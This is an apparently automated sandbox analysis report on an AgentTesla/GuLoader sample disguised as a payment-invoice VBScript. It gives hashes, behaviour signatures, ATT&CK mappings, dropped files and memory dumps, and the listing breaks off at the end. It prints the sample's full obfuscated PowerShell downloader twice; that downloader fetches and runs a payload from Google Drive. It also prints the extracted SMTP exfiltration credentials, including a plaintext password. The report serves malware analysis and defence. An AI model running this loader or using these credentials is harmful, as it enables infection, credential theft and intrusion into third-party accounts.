agenttesla | f544eba4ca4d129edc8c944d9b236ea7b92c71c0085617fb43eb3a451681c3ff

General

Target

Outstanding Payment Invoice PO 3400375980.vbs
Size

279KB
MD5

4dbc97f8d5317c9d1dfacb195dbe6af7
SHA1

c50c88d61aed7ec85c31f18267bca471cf94065d
SHA256

f544eba4ca4d129edc8c944d9b236ea7b92c71c0085617fb43eb3a451681c3ff
SHA512

8a6ddaea7ce4dd6767fa309339e23b38e7f2b77e03e2d5111fe772195231c2ba09ade5a4d4def839204316d0a50d3315cdbab29d7d0e193dc8ce6fcec827b578
SSDEEP

6144:LmdAYDLBLW+8A1ytW3xrbjsSFuHeEC57kdmXl45zaoGGqAP3MQ9scOKR8q3iQFw0:6nS2Im4WnPwp

Score

10^/10

agenttesla guloader downloader keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.electricistas-24hs.com.ar
Port:
587
Username:
contactos@electricistas-24hs.com.ar
Password:
Martin*olmos2017
Email To:
indexforwarder@gmail.com

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Blocklisted process makes network request 3 IoCs

Processes:

WScript.exepowershell.exe

flow pid process

3 2212 WScript.exe
7 2516 powershell.exe
9 2516 powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

6 drive.google.com
7 drive.google.com
11 drive.google.com
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

15 api.ipify.org
16 api.ipify.org
17 ip-api.com
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

2660 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

2744 powershell.exe
2660 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2744 set thread context of 2660 2744 powershell.exe wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid process

2516 powershell.exe
2744 powershell.exe
2744 powershell.exe
2660 wab.exe
2660 wab.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

2744 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 2516 powershell.exe
Token: SeDebugPrivilege 2744 powershell.exe
Token: SeDebugPrivilege 2660 wab.exe

flow	pid	process
3	2212	WScript.exe
7	2516	powershell.exe
9	2516	powershell.exe

flow	ioc
6	drive.google.com
7	drive.google.com
11	drive.google.com

flow	ioc
15	api.ipify.org
16	api.ipify.org
17	ip-api.com

pid	process
2660	wab.exe

pid	process
2744	powershell.exe
2660	wab.exe

description	pid	process	target process
PID 2744 set thread context of 2660	2744	powershell.exe	wab.exe

pid	process
2516	powershell.exe
2744	powershell.exe
2744	powershell.exe
2660	wab.exe
2660	wab.exe

pid	process
2744	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2516	powershell.exe
Token: SeDebugPrivilege	2744	powershell.exe
Token: SeDebugPrivilege	2660	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2212 wrote to memory of 2516	2212	WScript.exe	powershell.exe
PID 2212 wrote to memory of 2516	2212	WScript.exe	powershell.exe
PID 2212 wrote to memory of 2516	2212	WScript.exe	powershell.exe
PID 2516 wrote to memory of 2408	2516	powershell.exe	cmd.exe
PID 2516 wrote to memory of 2408	2516	powershell.exe	cmd.exe
PID 2516 wrote to memory of 2408	2516	powershell.exe	cmd.exe
PID 2516 wrote to memory of 2744	2516	powershell.exe	powershell.exe
PID 2516 wrote to memory of 2744	2516	powershell.exe	powershell.exe
PID 2516 wrote to memory of 2744	2516	powershell.exe	powershell.exe
PID 2516 wrote to memory of 2744	2516	powershell.exe	powershell.exe
PID 2744 wrote to memory of 2900	2744	powershell.exe	cmd.exe
PID 2744 wrote to memory of 2900	2744	powershell.exe	cmd.exe
PID 2744 wrote to memory of 2900	2744	powershell.exe	cmd.exe
PID 2744 wrote to memory of 2900	2744	powershell.exe	cmd.exe
PID 2744 wrote to memory of 2660	2744	powershell.exe	wab.exe
PID 2744 wrote to memory of 2660	2744	powershell.exe	wab.exe
PID 2744 wrote to memory of 2660	2744	powershell.exe	wab.exe
PID 2744 wrote to memory of 2660	2744	powershell.exe	wab.exe
PID 2744 wrote to memory of 2660	2744	powershell.exe	wab.exe
PID 2744 wrote to memory of 2660	2744	powershell.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Outstanding Payment Invoice PO 3400375980.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2212

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Oildom = 1;$boatings='Substrin';$boatings+='g';Function Crystallize($Hjlpetropper){$Overloading=$Hjlpetropper.Length-$Oildom;For($Devastated=5; $Devastated -lt $Overloading; $Devastated+=(6)){$Bugging+=$Hjlpetropper.$boatings.Invoke($Devastated, $Oildom);}$Bugging;}function Crooisite($Ssterligt){. ($Rolfs) ($Ssterligt);}$Ligetil=Crystallize 'QuadrMNinevoPeberzBrandiGullilullmaldestiaC.res/Spere5Sesam.Gamma0dagsa E ekt(UnmetWOphngi Knobn Nonrd Synto evilwManersWhoop AspaN,neseTNgne. wakef1Hagls0Affyr.A,hol0Tran ;Storm .maasWSkippiSpisenth,rm6South4Skogg;Progr Bryllxvade,6Fiori4Goats;Dk,in PrearDaffsvDksbl:Maske1Balan2Rit,a1 Mort. Hand0 Lysb)Beglo GenreGNdrineStatucFdekakTo,nsoCherc/Klaus2 Lmwh0Prote1tofam0Sekti0 Fysi1Phot.0Co.pr1Behol KkkenFNemopiForaarUbereeudstefovermoAlderxLenca/Snebr1Au er2Do,rh1Verte. erma0 Scal ';$Counterearth=Crystallize 'DanisUDehorsmurd.eTeaserunexc-.ornlASkewlgMiilieseesanSprintTropa ';$Intermewed=Crystallize ' FlaghTvangtContrtT enepErhv,sSwitc:A,mbe/ Gala/BestydSkeerr Tandi unlivNaturepl,nt.HjfregRandsoInd so Hngeg WarblReveseUt.os.Unvehc incooUnfrum S,ns/tiltru TitacJeedh? Sk heFidusxWatchpki smoJagtbrA.ilat Jetw=,piredReereoVin awSekunnBrordlCircuo Ha aaFe tcdUdbed&Kerati ShandSnaph=Immor1 BilliL,gia- LillmFljteeSupra5C,mpusS,ldeG,ovemoApproPPrimu_ Ud.iYN merO,utvivEne.eASkalaY ch l3 InteoJewyrQParonNAutom7Soldican ib9Rekr.mHend,1A fyr9F,fth3Plu.k0,ille3Gamblj laguYS,adrsU.resTLeve. ';$Differentiators126=Crystallize 'Forsk> Anh. ';$Rolfs=Crystallize 'St diiTurbleDyb,exRumsk ';$Monismen = Crystallize ' Beliera agcAsfa hMarinot ito gttak% .rmma ForhpCaribpParapdZadrua,orintTransaKamik% hyli\Ethi.SUnrevaMa sel,paakvVejrpuDuckeyMelanrAcili.ModarQ Asteu fblei.uver Kon.&Alien&Ewaty ,ltereCarbrcTh,meh Ra do Catt bores$Su.me ';Crooisite (Crystallize 'For a$ skurgFugl,lFa,tgoMysidb FagtaV mellStvle:BesigO.proglD fogyBrawlmCa.orpWhystipl nesMusikkSu eneWinds= Beta(K,skbcLixinmNazibdKomme Over/Brolgc Nons Qu.n$TjetsMSkarroTilrenBelchiGrunds FritmfrembeGrften.ophe)Kredi ');Crooisite (Crystallize 'Sarac$PractgSnk,llPro noQualibP,ebeaOpfrilRadi :Tara POpererAnglimSco riPestreMonoclKennlaTjrslaunscinAcquie StornDe aseOzonlsillus1 B be9Subin8Hanhu= Tien$Atom.IloggenGa.gat vere,rougrSeptemKun te natuw ntime,iskedSpare.koglesH.espp KisslS,ftii rbejt tuea(Trafi$Dyv lDPondfiUninffPuppefBunkre Ing.rSottaeStalknKoor tCompai chefapterotE,genoPresur DeclsOverl1Omfa 2Kager6 Besl)Itona ');$Intermewed=$Prmielaanenes198[0];Crooisite (Crystallize 'Triks$ClaivgtroldlNoncooRibbebStyrta Anval Fow.:rowd,S VrdipRoynieRe soj LivslSlanggEgoths ByggpWeakeaSprinnKrftsd BasneMu.ikn ,uposIneff=Pa,enNFeatheCharmw Afga-TvillOFutilbAftaljDraweeAppelc oligtGryde PrintSLiggeyRequis ExogtFyrste nstomWhite.ForsmN Ori eFdeput Unba.Ver,eW.aloneToitobTilkrCAfstrlDecariPrelaeRegrenAntirtAsse. ');Crooisite (Crystallize 'Pro t$samurS Pa,hpSelskeflounjarmielEthylg AftrsSkraap Brysa Auton s,padUn.aseFortonMomess.yphe.ErgonHstoryeVaticaVivisdVenn eAnhydrPote.sOmslu[Skrkr$ YnglCUnd toUnpenuKongensandhtDronne Unidrsparee.luttaMultirF.irct OsmahCogno]Kolle=,ceno$ FodtLSuperi L,cagBedsteBrugetAndani KronlInter ');$Traskendes31=Crystallize 'fintlSU licpAsepteFavorjMarinlTryklgChorisKreispGenneaBlaabn Ex.tdInd,ce Vil,n OpersEgord. joksDRu.leo VelswFrikanPansplR tiooBoobbacomp,dHighcFPolyciSidevlSamm.e.seud(Nrmel$HyphoIR ttenOve st Do.ue ElkhrS.ltdmDiakreP.ognwS nateSvaredGluci,norma$Ov,rrNTwisto ,dsknRi,nieDesmen periuTotalns nsacKna diReseraDelprtAfriviVindkvMo,kee Loqu6Alkoh9magis) Aneu ';$Traskendes31=$Olympiske[1]+$Traskendes31;$Nonenunciative69=$Olympiske[0];Crooisite (Crystallize ' Pala$ Un,mgUltralBlodpo PisobZygoga IndslGladi:Surm.sTilseu Nedik UntrkHabsbeReclarStrm,lModenare,rogsoupee DiplnRekap=monal(Ak.arTIndskeAnslas Affat arr-NatroP DukkaindictA tochre et Nahan$.rodeNBow.ioK.lhanBushfeCystinCoinmu.ydkunS gilcIn,aaiColumaWistst Lo.ui.lancvAvoceeSenil6Nskef9Gule.)Nerve ');while (!$sukkerlagen) {Crooisite (Crystallize ',rote$ ,rungspecilYvonnoSpirabFlippaStenllRab i:HandlwB,erboKarlsr Overk FloomCr oka Gavlt ForteSkade=Jamb.$Rement torhrKursuu kuske Del ') ;Crooisite $Traskendes31;Crooisite (Crystallize 'De enSPinxtt.riveaOphavr Borgt Elys-NoncuSPro.hlOut oeHoop,e NonmpGunni Fos 4Dis.u ');Crooisite (Crystallize ' Cato$ DreagPa,nolDelstoV,lgabStormaBildpl An.m:OsmolsReklau Til ksvenskPracteteletrMadagl Undia K.rsg Repre farvntidsb=Urban( TantT de.reQuerisgennetomve,- discP odboaK,aestChlorh Sten Miled$Fo,tsNKig.eoEngran Decoeundron MiniuRimptn pe ecAngioianticaInvest R adi Coz.vCaprieI der6Fjerd9 Cr.p) espe ') ;Crooisite (Crystallize 'Ve.te$BillegArb.jlZoophodiacebTempea CoeflSnild: ParaF Sta oF rbrrHyperkSup.aaDr llm selvmDa oye .pulrEspinsKemi.lUnc.aaCarrogBeridsFis,g=Misha$FlottgZanetl.omamo ultb,auriaavanglO,tag:PreroB T ngrSkoleu AbscgGastreDobber riedImpreeAs.utfPre.ai,ontunSangteE,maarBredbedes rt Opte+ Frem+ ,lum%selsk$hi,knPInd erDetalmG.aneiDefineFinanlNathaaTactiamilitnmil.seQuaesnA,neleInexpsdispo1 Fall9Super8i.sig.an,encInteroS kkeuMy,ctn omebt Extr ') ;$Intermewed=$Prmielaanenes198[$Forkammerslags];}Crooisite (Crystallize ' A.nd$LatedgMultil Pan,oCocktbAlbe.aReautl Iden:C,ingH EuryeBallesSvvnitprefiePrisph UdfyaTeosoaUkontrChroneForlftN nal Plut= Pave Tobi GBegite amestathei- StrsC OveroWasntn lovetC lloeUndernEmp rtMyoma Jazzb$hairdN RomboLod.enSvigeeAngivnForebuFolkendoctrc EuroiWardeaAnskrtSangbiEmbolvFlle e Ekvi6.iber9,okam ');Crooisite (Crystallize 'Jazzm$VerisgAlfonlK steo ShilbUphoaaJ,nssljeron:culliNFolkeeA,vormab.utaD,llitUndonoForsacKusk eSupperPhalaaGro n Nondi= Chre Felin[ ViljSAnchoycumulsAstert,sariePhle.mNglep.UoverCthai,oAffugnDisinv.ilteePris.rUd,vet Gift]Fi,de:Ind g:Slgt.FSerperLustroD,cipm Io oB bogsa Indts .rbeeUdvik6Udfri4 SundS Glact Kbenr EkspiSocion CelegStrad(Adso $Bart.HSeksae Vr ismirrotPhenyeAgnosh RefeaNormoa Sinor.unkeecoeditR,ets)Senes ');Crooisite (Crystallize 'Chu,c$.mbragLi otlOvervo.ovedb PulwaFo.lslR,jse:jewela Rk erRowt bLivede PlatjnonmedAtrioefejlfrIkonibSvible Pr,ifCatenoVidnelDiddekMagnenActiviFy dundis,ng DrameTen,urchaf nSubn,e treasOmfor Ariet=S,utt Cat,e[GudsfSDrukny Yaxcs ,turtKaarieSnvlemPunk,.Rec.sTNonexe De.oxDircht ,ane.WelleEsammenHensic ProboPrecodSaxboiB.trynOutprgInter]Intra: Kvin:BlockAKapitSRigsrCpickwIPeri.ISu.su..ffleGRemr eF,lketkompoSSpiritFylderEvangiUnscenplan,gSulte(inv,t$UniveN raae EmigmStgaaanilgatBils.odispocAfgife Hydrr SkndaImper)Vinke ');Crooisite (Crystallize 'Gener$,nprog ollelCy.oloMoralb,temnaFarmal Sti.:FursnPSemigrSele oRacebtAuramaIntagndekandP.tenrUrbicoUr,liu Bar sArbej=Lands$CaveraGiniarFeltmbUndereKundsj Spard.spsseVi gurKildrbAntihe StatfKaneloUrostlSanctk Ca nnSkiltiDec mn HawkgPariseNringr,enebnFlacoeKundesKhedi.SouthsUnimauFreskb AntisKomedtYoun.rNanogiDode.nHazelg ,ele( Frem3Sansn1Recip8Stikl3Farse5Dispr3hand ,Tilsl2Na,pa7Kom a4Protr7Sa le1Sprin) Pr,f ');Crooisite $Protandrous;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2516

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Salvuyr.Qui && echo $"
3⤵
PID:2408

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Oildom = 1;$boatings='Substrin';$boatings+='g';Function Crystallize($Hjlpetropper){$Overloading=$Hjlpetropper.Length-$Oildom;For($Devastated=5; $Devastated -lt $Overloading; $Devastated+=(6)){$Bugging+=$Hjlpetropper.$boatings.Invoke($Devastated, $Oildom);}$Bugging;}function Crooisite($Ssterligt){. ($Rolfs) ($Ssterligt);}$Ligetil=Crystallize 'QuadrMNinevoPeberzBrandiGullilullmaldestiaC.res/Spere5Sesam.Gamma0dagsa E ekt(UnmetWOphngi Knobn Nonrd Synto evilwManersWhoop AspaN,neseTNgne. wakef1Hagls0Affyr.A,hol0Tran ;Storm .maasWSkippiSpisenth,rm6South4Skogg;Progr Bryllxvade,6Fiori4Goats;Dk,in PrearDaffsvDksbl:Maske1Balan2Rit,a1 Mort. Hand0 Lysb)Beglo GenreGNdrineStatucFdekakTo,nsoCherc/Klaus2 Lmwh0Prote1tofam0Sekti0 Fysi1Phot.0Co.pr1Behol KkkenFNemopiForaarUbereeudstefovermoAlderxLenca/Snebr1Au er2Do,rh1Verte. erma0 Scal ';$Counterearth=Crystallize 'DanisUDehorsmurd.eTeaserunexc-.ornlASkewlgMiilieseesanSprintTropa ';$Intermewed=Crystallize ' FlaghTvangtContrtT enepErhv,sSwitc:A,mbe/ Gala/BestydSkeerr Tandi unlivNaturepl,nt.HjfregRandsoInd so Hngeg WarblReveseUt.os.Unvehc incooUnfrum S,ns/tiltru TitacJeedh? Sk heFidusxWatchpki smoJagtbrA.ilat Jetw=,piredReereoVin awSekunnBrordlCircuo Ha aaFe tcdUdbed&Kerati ShandSnaph=Immor1 BilliL,gia- LillmFljteeSupra5C,mpusS,ldeG,ovemoApproPPrimu_ Ud.iYN merO,utvivEne.eASkalaY ch l3 InteoJewyrQParonNAutom7Soldican ib9Rekr.mHend,1A fyr9F,fth3Plu.k0,ille3Gamblj laguYS,adrsU.resTLeve. ';$Differentiators126=Crystallize 'Forsk> Anh. ';$Rolfs=Crystallize 'St diiTurbleDyb,exRumsk ';$Monismen = Crystallize ' Beliera agcAsfa hMarinot ito gttak% .rmma ForhpCaribpParapdZadrua,orintTransaKamik% hyli\Ethi.SUnrevaMa sel,paakvVejrpuDuckeyMelanrAcili.ModarQ Asteu fblei.uver Kon.&Alien&Ewaty ,ltereCarbrcTh,meh Ra do Catt bores$Su.me ';Crooisite (Crystallize 'For a$ skurgFugl,lFa,tgoMysidb FagtaV mellStvle:BesigO.proglD fogyBrawlmCa.orpWhystipl nesMusikkSu eneWinds= Beta(K,skbcLixinmNazibdKomme Over/Brolgc Nons Qu.n$TjetsMSkarroTilrenBelchiGrunds FritmfrembeGrften.ophe)Kredi ');Crooisite (Crystallize 'Sarac$PractgSnk,llPro noQualibP,ebeaOpfrilRadi :Tara POpererAnglimSco riPestreMonoclKennlaTjrslaunscinAcquie StornDe aseOzonlsillus1 B be9Subin8Hanhu= Tien$Atom.IloggenGa.gat vere,rougrSeptemKun te natuw ntime,iskedSpare.koglesH.espp KisslS,ftii rbejt tuea(Trafi$Dyv lDPondfiUninffPuppefBunkre Ing.rSottaeStalknKoor tCompai chefapterotE,genoPresur DeclsOverl1Omfa 2Kager6 Besl)Itona ');$Intermewed=$Prmielaanenes198[0];Crooisite (Crystallize 'Triks$ClaivgtroldlNoncooRibbebStyrta Anval Fow.:rowd,S VrdipRoynieRe soj LivslSlanggEgoths ByggpWeakeaSprinnKrftsd BasneMu.ikn ,uposIneff=Pa,enNFeatheCharmw Afga-TvillOFutilbAftaljDraweeAppelc oligtGryde PrintSLiggeyRequis ExogtFyrste nstomWhite.ForsmN Ori eFdeput Unba.Ver,eW.aloneToitobTilkrCAfstrlDecariPrelaeRegrenAntirtAsse. ');Crooisite (Crystallize 'Pro t$samurS Pa,hpSelskeflounjarmielEthylg AftrsSkraap Brysa Auton s,padUn.aseFortonMomess.yphe.ErgonHstoryeVaticaVivisdVenn eAnhydrPote.sOmslu[Skrkr$ YnglCUnd toUnpenuKongensandhtDronne Unidrsparee.luttaMultirF.irct OsmahCogno]Kolle=,ceno$ FodtLSuperi L,cagBedsteBrugetAndani KronlInter ');$Traskendes31=Crystallize 'fintlSU licpAsepteFavorjMarinlTryklgChorisKreispGenneaBlaabn Ex.tdInd,ce Vil,n OpersEgord. joksDRu.leo VelswFrikanPansplR tiooBoobbacomp,dHighcFPolyciSidevlSamm.e.seud(Nrmel$HyphoIR ttenOve st Do.ue ElkhrS.ltdmDiakreP.ognwS nateSvaredGluci,norma$Ov,rrNTwisto ,dsknRi,nieDesmen periuTotalns nsacKna diReseraDelprtAfriviVindkvMo,kee Loqu6Alkoh9magis) Aneu ';$Traskendes31=$Olympiske[1]+$Traskendes31;$Nonenunciative69=$Olympiske[0];Crooisite (Crystallize ' Pala$ Un,mgUltralBlodpo PisobZygoga IndslGladi:Surm.sTilseu Nedik UntrkHabsbeReclarStrm,lModenare,rogsoupee DiplnRekap=monal(Ak.arTIndskeAnslas Affat arr-NatroP DukkaindictA tochre et Nahan$.rodeNBow.ioK.lhanBushfeCystinCoinmu.ydkunS gilcIn,aaiColumaWistst Lo.ui.lancvAvoceeSenil6Nskef9Gule.)Nerve ');while (!$sukkerlagen) {Crooisite (Crystallize ',rote$ ,rungspecilYvonnoSpirabFlippaStenllRab i:HandlwB,erboKarlsr Overk FloomCr oka Gavlt ForteSkade=Jamb.$Rement torhrKursuu kuske Del ') ;Crooisite $Traskendes31;Crooisite (Crystallize 'De enSPinxtt.riveaOphavr Borgt Elys-NoncuSPro.hlOut oeHoop,e NonmpGunni Fos 4Dis.u ');Crooisite (Crystallize ' Cato$ DreagPa,nolDelstoV,lgabStormaBildpl An.m:OsmolsReklau Til ksvenskPracteteletrMadagl Undia K.rsg Repre farvntidsb=Urban( TantT de.reQuerisgennetomve,- discP odboaK,aestChlorh Sten Miled$Fo,tsNKig.eoEngran Decoeundron MiniuRimptn pe ecAngioianticaInvest R adi Coz.vCaprieI der6Fjerd9 Cr.p) espe ') ;Crooisite (Crystallize 'Ve.te$BillegArb.jlZoophodiacebTempea CoeflSnild: ParaF Sta oF rbrrHyperkSup.aaDr llm selvmDa oye .pulrEspinsKemi.lUnc.aaCarrogBeridsFis,g=Misha$FlottgZanetl.omamo ultb,auriaavanglO,tag:PreroB T ngrSkoleu AbscgGastreDobber riedImpreeAs.utfPre.ai,ontunSangteE,maarBredbedes rt Opte+ Frem+ ,lum%selsk$hi,knPInd erDetalmG.aneiDefineFinanlNathaaTactiamilitnmil.seQuaesnA,neleInexpsdispo1 Fall9Super8i.sig.an,encInteroS kkeuMy,ctn omebt Extr ') ;$Intermewed=$Prmielaanenes198[$Forkammerslags];}Crooisite (Crystallize ' A.nd$LatedgMultil Pan,oCocktbAlbe.aReautl Iden:C,ingH EuryeBallesSvvnitprefiePrisph UdfyaTeosoaUkontrChroneForlftN nal Plut= Pave Tobi GBegite amestathei- StrsC OveroWasntn lovetC lloeUndernEmp rtMyoma Jazzb$hairdN RomboLod.enSvigeeAngivnForebuFolkendoctrc EuroiWardeaAnskrtSangbiEmbolvFlle e Ekvi6.iber9,okam ');Crooisite (Crystallize 'Jazzm$VerisgAlfonlK steo ShilbUphoaaJ,nssljeron:culliNFolkeeA,vormab.utaD,llitUndonoForsacKusk eSupperPhalaaGro n Nondi= Chre Felin[ ViljSAnchoycumulsAstert,sariePhle.mNglep.UoverCthai,oAffugnDisinv.ilteePris.rUd,vet Gift]Fi,de:Ind g:Slgt.FSerperLustroD,cipm Io oB bogsa Indts .rbeeUdvik6Udfri4 SundS Glact Kbenr EkspiSocion CelegStrad(Adso $Bart.HSeksae Vr ismirrotPhenyeAgnosh RefeaNormoa Sinor.unkeecoeditR,ets)Senes ');Crooisite (Crystallize 'Chu,c$.mbragLi otlOvervo.ovedb PulwaFo.lslR,jse:jewela Rk erRowt bLivede PlatjnonmedAtrioefejlfrIkonibSvible Pr,ifCatenoVidnelDiddekMagnenActiviFy dundis,ng DrameTen,urchaf nSubn,e treasOmfor Ariet=S,utt Cat,e[GudsfSDrukny Yaxcs ,turtKaarieSnvlemPunk,.Rec.sTNonexe De.oxDircht ,ane.WelleEsammenHensic ProboPrecodSaxboiB.trynOutprgInter]Intra: Kvin:BlockAKapitSRigsrCpickwIPeri.ISu.su..ffleGRemr eF,lketkompoSSpiritFylderEvangiUnscenplan,gSulte(inv,t$UniveN raae EmigmStgaaanilgatBils.odispocAfgife Hydrr SkndaImper)Vinke ');Crooisite (Crystallize 'Gener$,nprog ollelCy.oloMoralb,temnaFarmal Sti.:FursnPSemigrSele oRacebtAuramaIntagndekandP.tenrUrbicoUr,liu Bar sArbej=Lands$CaveraGiniarFeltmbUndereKundsj Spard.spsseVi gurKildrbAntihe StatfKaneloUrostlSanctk Ca nnSkiltiDec mn HawkgPariseNringr,enebnFlacoeKundesKhedi.SouthsUnimauFreskb AntisKomedtYoun.rNanogiDode.nHazelg ,ele( Frem3Sansn1Recip8Stikl3Farse5Dispr3hand ,Tilsl2Na,pa7Kom a4Protr7Sa le1Sprin) Pr,f ');Crooisite $Protandrous;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2744

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Salvuyr.Qui && echo $"
4⤵
PID:2900

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2660

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
304B

MD5
47f7582a08a494baf539e7f1b5b32d13

SHA1
b9966b35c9d48ea1950d3f24d6f6215f5cf88b21

SHA256
6b78d1ffb0b2876f1a103d1d8575d1541e990628ff4941c3c854d892e6a9e40d

SHA512
d1c40cd03261c6682f349d2f98d0c6c3779cf888959b0bf04c05880d9ab5560cf0516887d2e01e2f79c23b4236dc960563ca3901d4980644426eaf48acaad1c5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4F424R0BRM3N4WBY1Z4P.temp
Filesize
7KB

MD5
edc8383ef52c6a0e6a86a6ea71980355

SHA1
67d9f34db523689eb1fecef0c2193792cc16003c

SHA256
f3f1d31d1b7f08c930119fabd445b01b847ca387b6952e1923657a51ffc86ee5

SHA512
03656f9732f00adb7f9c6762fc8ebdeedff90b7686763008b7792d8baa294c677363fd4e4ea87a8b2cc95ca1afad16ded7633190d0edccd6c861776b2eb9357f

Download Submit
C:\Users\Admin\AppData\Roaming\Salvuyr.Qui
Filesize
450KB

MD5
56863140c25c372b602fac03f8bf78a1

SHA1
9e3ba6deef83029aae67321d35d82ca7f6ebccc8

SHA256
ff38b3267ae77b83c8a840d8c838261d9890451cbd87c5c083667d67b65f7da9

SHA512
aabe7c92c5d4ea050caf65e9e3b2a191103487a6a70c2685978c30d6486af694e5435b89957551c1f2bcf66011ec5a6dec0d57045ab32b0f1cb727c9975d82a2

Download Submit
memory/2516-87-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp

Filesize
9.6MB

Download
memory/2516-27-0x0000000002430000-0x00000000024B0000-memory.dmp

Filesize
512KB

Download
memory/2516-26-0x0000000002430000-0x00000000024B0000-memory.dmp

Filesize
512KB

Download
memory/2516-25-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp

Filesize
9.6MB

Download
memory/2516-41-0x0000000002430000-0x00000000024B0000-memory.dmp

Filesize
512KB

Download
memory/2516-23-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp

Filesize
9.6MB

Download
memory/2516-24-0x0000000002430000-0x00000000024B0000-memory.dmp

Filesize
512KB

Download
memory/2516-35-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp

Filesize
9.6MB

Download
memory/2516-36-0x0000000002430000-0x00000000024B0000-memory.dmp

Filesize
512KB

Download
memory/2516-21-0x000000001B350000-0x000000001B632000-memory.dmp

Filesize
2.9MB

Download
memory/2516-22-0x0000000002410000-0x0000000002418000-memory.dmp

Filesize
32KB

Download
memory/2516-39-0x0000000002430000-0x00000000024B0000-memory.dmp

Filesize
512KB

Download
memory/2516-40-0x0000000002430000-0x00000000024B0000-memory.dmp

Filesize
512KB

Download
memory/2660-59-0x0000000000530000-0x0000000001592000-memory.dmp

Filesize
16.4MB

Download
memory/2660-58-0x0000000077226000-0x0000000077227000-memory.dmp

Filesize
4KB

Download
memory/2660-97-0x000000006EAC0000-0x000000006F1AE000-memory.dmp

Filesize
6.9MB

Download
memory/2660-95-0x0000000021F50000-0x0000000021F90000-memory.dmp

Filesize
256KB

Download
memory/2660-93-0x000000006EAC0000-0x000000006F1AE000-memory.dmp

Filesize
6.9MB

Download
memory/2660-90-0x0000000021F50000-0x0000000021F90000-memory.dmp

Filesize
256KB

Download
memory/2660-89-0x00000000015A0000-0x00000000039FE000-memory.dmp

Filesize
36.4MB

Download
memory/2660-88-0x0000000000530000-0x0000000000572000-memory.dmp

Filesize
264KB

Download
memory/2660-86-0x000000006EAC0000-0x000000006F1AE000-memory.dmp

Filesize
6.9MB

Download
memory/2660-84-0x00000000771F0000-0x00000000772C6000-memory.dmp

Filesize
856KB

Download
memory/2660-52-0x00000000015A0000-0x00000000039FE000-memory.dmp

Filesize
36.4MB

Download
memory/2660-83-0x0000000000530000-0x0000000001592000-memory.dmp

Filesize
16.4MB

Download
memory/2660-55-0x0000000077000000-0x00000000771A9000-memory.dmp

Filesize
1.7MB

Download
memory/2660-56-0x00000000771F0000-0x00000000772C6000-memory.dmp

Filesize
856KB

Download
memory/2744-57-0x0000000006080000-0x00000000084DE000-memory.dmp

Filesize
36.4MB

Download
memory/2744-85-0x0000000006080000-0x00000000084DE000-memory.dmp

Filesize
